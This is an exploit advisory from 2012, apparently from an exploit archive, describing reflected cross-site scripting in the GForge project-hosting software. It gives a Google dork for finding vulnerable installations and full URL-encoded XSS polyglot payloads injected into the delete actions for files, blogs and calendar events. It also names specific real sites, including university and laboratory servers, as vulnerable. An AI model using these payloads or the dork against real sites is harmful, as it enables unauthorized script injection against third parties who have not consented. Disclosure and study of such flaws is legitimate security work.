Gforge.org Cross Site Scripting

`# Exploit Title: GForge Cross Site Scripting  
# Date: 30.01.2012  
# Author: Sony  
# Software Link: http://gforge.org  
# Google Dorks: inurl:gf/user/ site:edu (gov,com,org,etc..) or another  
dorks (it's simple)  
# Web Browser : Mozilla Firefox  
# Blog : http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/01/gforge-cross-site-scripting.html  
..................................................................  
  
Well, we have interesting xss in the GForge.  
  
But we can test it on our accounts. We can made 2 accounts for test.  
  
XSS found in the files,calendar,messagewall (search users), blogs..  
  
Files.  
  
Upload our file.  
  
http://gforge.org/gf/user/eleo/userfiles/  
  
And press button delete and open link in the new window and add in the url  
our xss.  
  
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[ourxss  
is here]  
  
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://1.bp.blogspot.com/-ob_5W9q6IOE/TybK50KNkHI/AAAAAAAAAU4/zcX5uwx-FDs/s1600/1234.JPG  
  
Test this on your account name.  
  
Well, now..blog.  
  
Create post and press button delete and open link in the new window and add  
in the url our xss.  
  
gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2[xss is here]  
  
http://gforge.org/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://1.bp.blogspot.com/-blGd0pC1uac/TybNH5m1LRI/AAAAAAAAAVE/X1_7uZTxpJ8/s1600/123454.JPG  
  
or..  
  
http://3.bp.blogspot.com/-QIqH6m6an2E/TybNMwaLUxI/AAAAAAAAAVQ/o439BgL8W2w/s1600/1234556.JPG  
  
Calendar..  
  
Open calendar and press button "add new event" and ress button delete and  
open link in the new window and add in the url our xss.  
  
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[ourxss  
is here]  
  
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E  
  
http://4.bp.blogspot.com/-l2PehXdxhPY/TybOC9eI8bI/AAAAAAAAAVc/dQfmhxCLy1o/s1600/calendar.JPG  
  
And we have xss in the gf/my/messagewall/ (search users)  
  
http://2.bp.blogspot.com/-7snLqFJ--f0/TybPLb9Un-I/AAAAAAAAAVo/f-z-jsdO1ns/s1600/search_user.JPG  
  
http://3.bp.blogspot.com/-zNZi2myMDLc/TybPOlJUqfI/AAAAAAAAAV0/MTFCewGtziU/s1600/search_users2.JPG  
  
Also we can see in google that a lot of sites have a gforge and vulnerable  
to xss.  
  
Joomlacode.org  
  
http://2.bp.blogspot.com/-BbfJ7fJ20EI/TybQT5U2fYI/AAAAAAAAAWA/RYMoX_VQZUk/s1600/123.JPG  
  
Stanford.edu  
  
http://3.bp.blogspot.com/-neXykFEhP18/TybQeg0kScI/AAAAAAAAAWM/Wfpn7wAc0OQ/s1600/stan.JPG  
  
  
http://2.bp.blogspot.com/-7Zwn9dCa_Ms/TybQjpYnq6I/AAAAAAAAAWY/1ZxT_pDJXzE/s1600/stan2.JPG  
  
  
https://code.ros.org/gf/account/?action=UserAdd  
https://forge.si.umich.edu/gf/account/?action=UserAdd  
http://media.lbl.gov/gf/account/?action=UserAdd  
etc..  
  
  
It's not a critical vulnerability, but it's possible to use if to change  
url for different users.  
`